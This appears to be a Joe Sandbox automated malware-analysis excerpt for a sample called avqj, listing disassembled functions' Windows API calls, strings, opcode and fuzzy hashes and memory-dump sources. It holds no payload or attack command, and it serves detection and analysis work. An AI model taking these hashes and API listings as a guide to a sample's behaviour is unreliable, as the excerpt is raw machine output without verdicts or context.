                                              • Opcode ID: 0aa8944f33cc464f303f22df98988ac673092265ae814491ecde66da370ccb0c
                                              • Instruction ID: fbac4342d4cf48703397a859d66ab63fd736eaa9142dd24b9f5ca633a18d9b08
                                              • Opcode Fuzzy Hash: 0aa8944f33cc464f303f22df98988ac673092265ae814491ecde66da370ccb0c
                                              • Instruction Fuzzy Hash: 29E02B31801620AFEBB66A204C5CAED3224EF10748F191567ED01FA340DB20CC4A9694
                                              Strings
                                              • Variable must be of type 'Object'., xrefs: 00ED486A
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Variable must be of type 'Object'.
                                              • API String ID: 0-109567571
                                              • Opcode ID: ced954c30d629b5a9748bb494b3a97e3efefd0761cacffb11dd1183ff7eeb8d0
                                              • Instruction ID: dc6bea4e184c1cfdbcf26a734eeb1a36251a62b88a707596f966c757cbbaac3d
                                              • Opcode Fuzzy Hash: ced954c30d629b5a9748bb494b3a97e3efefd0761cacffb11dd1183ff7eeb8d0
                                              • Instruction Fuzzy Hash: 18C25971A002059FCB24DF58C880BADB7F1FF19314F24916AE959BB3A1E771AD42CB91
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,00F1DC30), ref: 00EEDABB
                                              • GetLastError.KERNEL32 ref: 00EEDACA
                                              • CreateDirectoryW.KERNELBASE(?,00000000), ref: 00EEDAD9
                                              • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F1DC30), ref: 00EEDB36
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                              • String ID:
                                              • API String ID: 2267087916-0
                                              • Opcode ID: 92c5ccae6717f92d27bf7b078c3f6999dbd42535eba2467a774e8d118bbd5cf1
                                              • Instruction ID: f9c9ebdcf61270d68e7685b1e71cf1440949f5e4f08242cdf4436388ca9d8915
                                              • Opcode Fuzzy Hash: 92c5ccae6717f92d27bf7b078c3f6999dbd42535eba2467a774e8d118bbd5cf1
                                              • Instruction Fuzzy Hash: 78217F3050C2499F8700EF25DC818AAB7F8EE55368F155A1DF4ADE72A1E730D94ADB82
                                              APIs
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00EA09F8
                                                • Part of subcall function 00EA3634: RaiseException.KERNEL32(?,?,?,00EA0A1A,?,00000000,?,?,?,?,?,?,00EA0A1A,00000000,00F49758,00000000), ref: 00EA3694
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00EA0A15
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Exception@8Throw$ExceptionRaise
                                              • String ID: Unknown exception
                                              • API String ID: 3476068407-410509341
                                              • Opcode ID: 110e8a2a2f7e1e31bd0eba5be653cc06b53595d4a37c7278d43ca4f210824ee1
                                              • Instruction ID: 546e98c47e3f9d120c91d09d8b65b8324e7a75b04c65efac4b4e51069ec6ede5
                                              • Opcode Fuzzy Hash: 110e8a2a2f7e1e31bd0eba5be653cc06b53595d4a37c7278d43ca4f210824ee1
                                              • Instruction Fuzzy Hash: 61F0C83450030D778B01BA74D8469DEB7AC5E8A314B505120B814BD4A3EB70FA56C5C0
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: %.3d$X64
                                              • API String ID: 481472006-1077770165
                                              • Opcode ID: 0fb6fd8ef403875f645b3d7b5110d4ebc822fcb072dcbdcbc02eec1ce37279dd
                                              • Instruction ID: 331fc58a034bce7b1515843495684fbe7cd7e61ba8c2912cf82c2436ba509432
                                              • Opcode Fuzzy Hash: 0fb6fd8ef403875f645b3d7b5110d4ebc822fcb072dcbdcbc02eec1ce37279dd
                                              • Instruction Fuzzy Hash: 57D012A1C0401CD6CF90AA90994D8FD737CE718740F509453F916F5340EA34D50AAB21
                                              APIs
                                              • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00F08C52
                                              • TerminateProcess.KERNEL32(00000000), ref: 00F08C59
                                              • FreeLibrary.KERNEL32(?,?,?,?), ref: 00F08E3A
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Process$CurrentFreeLibraryTerminate
                                              • String ID:
                                              • API String ID: 146820519-0
                                              • Opcode ID: 24eb94c8274e02696065fd00515d47d41188705f3a847dba168c1253fc776a40
                                              • Instruction ID: 9ad916fb9aaffa53ff808b9b2353bfb02758f69bb5c9cf1c7992b91d0e2e1af0
                                              • Opcode Fuzzy Hash: 24eb94c8274e02696065fd00515d47d41188705f3a847dba168c1253fc776a40
                                              • Instruction Fuzzy Hash: 0D127C71A083419FC714DF24C484B6ABBE1FF89364F14895DE8899B392DB30E946DF92
                                              APIs
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E83236
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E8323E
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E83249
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E83254
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E8325C
                                                • Part of subcall function 00E83205: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E83264
                                                • Part of subcall function 00E8318C: RegisterWindowMessageW.USER32(00000004,?,00E82906), ref: 00E831E4
                                              • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00E829AC
                                              • OleInitialize.OLE32 ref: 00E829CA
                                              • CloseHandle.KERNEL32(00000000,00000000), ref: 00EC39E7
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                              • String ID:
                                              • API String ID: 1986988660-0
                                              • Opcode ID: 0ce584cf673f078db08713782a0d7d5b567caa92ec659df6cdd62acf1247f273
                                              • Instruction ID: 1ea7b6466fe40c172e18e196a91ee3671a6c4e164aabeae62e22b7c660fde87b
                                              • Opcode Fuzzy Hash: 0ce584cf673f078db08713782a0d7d5b567caa92ec659df6cdd62acf1247f273
                                              • Instruction Fuzzy Hash: 037199B19013088E87C8EF79AD696553BE0BB5A307B48932AD70DD7262FB305585FF50
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00E86CA1
                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00E86CB1
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 731d2e9408feaf27bb1f737e45c1e7453ae20545c86ea89a0673a90cc6fec2e2
                                              • Instruction ID: 21a00873b0edcc8977ee48193e7cae1ddae7f5461b936bf01191e579a7df79d8
                                              • Opcode Fuzzy Hash: 731d2e9408feaf27bb1f737e45c1e7453ae20545c86ea89a0673a90cc6fec2e2
                                              • Instruction Fuzzy Hash: 93315971A0060AEFDB14DF68C980B99F7B5FB04318F148629E91DA7240C7B1BE94CB90
                                              APIs
                                                • Part of subcall function 00E85F59: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00E86049
                                              • KillTimer.USER32(?,00000001,?,?), ref: 00E9FD44
                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E9FD53
                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EDFDD3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: IconNotifyShell_Timer$Kill
                                              • String ID:
                                              • API String ID: 3500052701-0
                                              • Opcode ID: 1ce52022cdbe2ab8a945b5d8fa3bc5a1d583a30fe0bb9add4534441baf6657bd
                                              • Instruction ID: d9906ffe207d2743a9e3a7276684cf8f83f297a658f3350a8e65c115cd3ef127
                                              • Opcode Fuzzy Hash: 1ce52022cdbe2ab8a945b5d8fa3bc5a1d583a30fe0bb9add4534441baf6657bd
                                              • Instruction Fuzzy Hash: 1D31B471904754AFEB22CF248845BE6BBEDEF16308F0014AED69EA7281C7745A85CB51
                                              APIs
                                              • CloseHandle.KERNELBASE(00000000,00000000,?,?,00EB895C,?,00F49CE8,0000000C), ref: 00EB8A94
                                              • GetLastError.KERNEL32(?,00EB895C,?,00F49CE8,0000000C), ref: 00EB8A9E
                                              • __dosmaperr.LIBCMT ref: 00EB8AC9
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: CloseErrorHandleLast__dosmaperr
                                              • String ID:
                                              • API String ID: 2583163307-0
                                              • Opcode ID: 32e207987a58032802adf3ce24aadd4b0c115d5efc1a4056d51bf5a6e75ed31d
                                              • Instruction ID: b58a61836bb21932ce9e6bc872cb690cd9b1604210316cf53d9f25afa5cb5e40
                                              • Opcode Fuzzy Hash: 32e207987a58032802adf3ce24aadd4b0c115d5efc1a4056d51bf5a6e75ed31d
                                              • Instruction Fuzzy Hash: 83016F3370516056D2942374AA867FF77CD8B81738F39221BF918BB2D2DE209C80D290
                                              APIs
                                              • SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00EB97CA,FF8BC369,00000000,00000002,00000000), ref: 00EB9754
                                              • GetLastError.KERNEL32(?,00EB97CA,FF8BC369,00000000,00000002,00000000,?,00EB5EF1,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00EA6F61), ref: 00EB975E
                                              • __dosmaperr.LIBCMT ref: 00EB9765
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorFileLastPointer__dosmaperr
                                              • String ID:
                                              • API String ID: 2336955059-0
                                              • Opcode ID: b381a4a81b788189f96a8f84a16baf08f454ce98087429c38b4c14c44677a4c2
                                              • Instruction ID: b3545a5daa88db7b74f687fac18473ad52e82c7aaa950704cff8ef84b0ab6d03
                                              • Opcode Fuzzy Hash: b381a4a81b788189f96a8f84a16baf08f454ce98087429c38b4c14c44677a4c2
                                              • Instruction Fuzzy Hash: CB012D32620528ABCB059F95DC05CDF37A9DB85320B240246F914AB291EF30ED0197D0
                                              APIs
                                              • TranslateMessage.USER32(?), ref: 00E8F22B
                                              • DispatchMessageW.USER32(?), ref: 00E8F239
                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00E8F24F
                                              • Sleep.KERNELBASE(0000000A), ref: 00E8F261
                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00ED327C
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                              • String ID:
                                              • API String ID: 3288985973-0
                                              • Opcode ID: 8127110204ac7e39afb206c54aec2af0dd701c8f884d19032f1a386b687b0db5
                                              • Instruction ID: 1a0b989b06d0382e2d1a9e5bf35fbd179b27070664785f94c5cb3c913db21bb7
                                              • Opcode Fuzzy Hash: 8127110204ac7e39afb206c54aec2af0dd701c8f884d19032f1a386b687b0db5
                                              • Instruction Fuzzy Hash: 22F082306043499BEB349BA0CC49FDA73ADEF84315F005A29E64DE31E0DB30954CDB22
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00E92FB6
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID: CALL
                                              • API String ID: 1385522511-4196123274
                                              • Opcode ID: ea9eef6b595c3371a0095a7aba0dd96685d6e60d7450dfe3efeda2dba30df1e0
                                              • Instruction ID: 5bb363d6e6b4239144dba4e4d6c885630fe149c9ba0dc7654a0dcea9dcd61d67
                                              • Opcode Fuzzy Hash: ea9eef6b595c3371a0095a7aba0dd96685d6e60d7450dfe3efeda2dba30df1e0
                                              • Instruction Fuzzy Hash: 02228B70608301AFCB14DF24C480A6ABBF1FF99314F14A95DF99AAB3A1D771E945CB42
                                              APIs
                                              • GetOpenFileNameW.COMDLG32(?), ref: 00EC4115
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                                • Part of subcall function 00E839DE: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00E839FD
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Name$Path$FileFullLongOpen
                                              • String ID: X
                                              • API String ID: 779396738-3081909835
                                              APIs
                                              • GetComputerNameW.KERNEL32(?,?), ref: 00EDE6F3
                                              Strings
                                              Similarity
                                              • API ID: ComputerName
                                              • String ID: X64
                                              • API String ID: 3545744682-893830106
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00EF9665
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00EF9673
                                              Similarity
                                              • API ID: PrivateProfileStringWrite$FullNamePath
                                              • String ID:
                                              • API String ID: 3876400906-0
                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00E83B33,?,00008000), ref: 00E86E80
                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00E83B33,?,00008000), ref: 00EC59A2
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              APIs
                                              • IsThemeActive.UXTHEME ref: 00E832C4
                                                • Part of subcall function 00E8326D: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00E83282
                                                • Part of subcall function 00E8326D: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00E83299
                                                • Part of subcall function 00E83312: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00E832EF,?), ref: 00E83342
                                                • Part of subcall function 00E83312: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00E832EF,?), ref: 00E83355
                                                • Part of subcall function 00E83312: GetFullPathNameW.KERNEL32(00007FFF,?,?,00F52418,00F52400,?,?,?,?,?,?,00E832EF,?), ref: 00E833C1
                                                • Part of subcall function 00E83312: SetCurrentDirectoryW.KERNELBASE(?,00000001,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E83442
                                              • SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00E832FE
                                              Similarity
                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
                                              • String ID:
                                              • API String ID: 1550534281-0
                                              APIs
                                              • timeGetTime.WINMM ref: 00E9F97A
                                                • Part of subcall function 00E8EDFE: GetInputState.USER32 ref: 00E8EEB7
                                              • Sleep.KERNEL32(00000000), ref: 00EDFAC2
                                              Similarity
                                              • API ID: InputSleepStateTimetime
                                              • String ID:
                                              • API String ID: 4149333218-0
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,00E8AE65,?,?,?), ref: 00E88793
                                              • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,00E8AE65,?,?,?), ref: 00E887C9
                                              Similarity
                                              • API ID: ByteCharMultiWide
                                              • String ID:
                                              • API String ID: 626452242-0
                                              APIs
                                              • __Init_thread_footer.LIBCMT ref: 00E8CE8E
                                              Similarity
                                              • API ID: Init_thread_footer
                                              • String ID:
                                              • API String ID: 1385522511-0
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              APIs
                                              • TerminateProcess.KERNELBASE ref: 00EA00AF
                                              Similarity
                                              • API ID: ProcessTerminate
                                              • String ID:
                                              • API String ID: 560597551-0
                                              APIs
                                                • Part of subcall function 00E8557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E85558,?,?,00EC4B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 00E8559E
                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 00EF8EBE
                                              Similarity
                                              • API ID: FullNamePathPrivateProfileString
                                              • String ID:
                                              • API String ID: 1991638491-0
                                              APIs
                                                • Part of subcall function 00E86332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E8633E
                                                • Part of subcall function 00E86332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E86350
                                                • Part of subcall function 00E86332: FreeLibrary.KERNEL32(00000000,?,?,00E8637F,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86362
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E8639F
                                                • Part of subcall function 00E862FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86304
                                                • Part of subcall function 00E862FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E86316
                                                • Part of subcall function 00E862FB: FreeLibrary.KERNEL32(00000000,?,?,00EC54C3,?,?,00E860AA,?,00000001,?,?,00000000), ref: 00E86329
                                              Similarity
                                              • API ID: Library$Load$AddressFreeProc
                                              • String ID:
                                              • API String ID: 2632591731-0
                                              APIs
                                              Similarity
                                              • API ID: __wsopen_s
                                              • String ID:
                                              • API String ID: 3347428461-0
                                              APIs
                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00E86B73,?,00010000,00000000,00000000,00000000,00000000), ref: 00E8B0AC
                                              Similarity
                                              • API ID: FileRead
                                              • String ID:
                                              • API String ID: 2738559852-0
                                              • Opcode ID: b2e8bb4e3e300638153ba3ec73f1c655533e43645295e78fcd86f3f68e2b4757
                                              • Instruction ID: 9dd3aa353aeef24aa5baeba452483dfa9597500958aa9496b9d8b48f07546695
                                              • Opcode Fuzzy Hash: b2e8bb4e3e300638153ba3ec73f1c655533e43645295e78fcd86f3f68e2b4757
                                              • Instruction Fuzzy Hash: B6113A31200705DFD7209E15C880BA7B7E9EF44354F10C42DE9AE97A51C7B2A949CB60
                                              APIs
                                              • GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00E833E9,00F52418,?,?,?,?,?,?,?,00E832EF,?), ref: 00E84227
                                                • Part of subcall function 00E884B7: _wcslen.LIBCMT ref: 00E884CA
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                              • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                              • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: FullNamePath_wcslen
                                              • String ID:
                                              • API String ID: 4019309064-0
                                              • Opcode ID: 5f9bcce2b741a8c3b001e3ffd77443f1b905ede0f4790dda4e18a4a555d7a851
                                              • Instruction ID: 71dec43294003b3d7f2cfcf759a8e736b312fc8de080f0e1f20f0d0e5b271f2e
                                              • Opcode Fuzzy Hash: 5f9bcce2b741a8c3b001e3ffd77443f1b905ede0f4790dda4e18a4a555d7a851
                                              • Instruction Fuzzy Hash: 2811E1B160420A9BCB40FBE48901EDD77F8EF09314B001065B99CF72E2EE70E7889B11
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
